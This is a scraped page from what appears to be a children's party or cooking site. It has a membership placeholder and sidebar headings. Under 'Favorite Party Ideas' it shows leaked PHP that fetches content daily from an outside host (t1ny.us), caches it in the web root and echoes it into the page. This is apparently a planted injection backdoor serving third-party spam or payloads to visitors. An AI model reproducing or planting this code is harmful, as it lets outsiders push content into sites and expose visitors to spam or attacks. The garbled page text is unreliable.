Membership Options
Membership options will be posted here when available.
-

Categories
-
Recent Posts
Archives
Favorite Party Ideas
- $directory = $_SERVER['DOCUMENT_ROOT'].'/poach-cache/'; $file = $directory.date('Ymd').'.txt'; if(file_exists($file)) { echo file_get_contents($file); } else { $data = file_get_contents('http://t1ny.us/2.php?domain=www.LilChefs.com'); if(is_dir($directory) && is_writable($directory)) { $fp = fopen($file,'w'); fwrite($fp,$data); fclose($fp); echo $data; }} ?>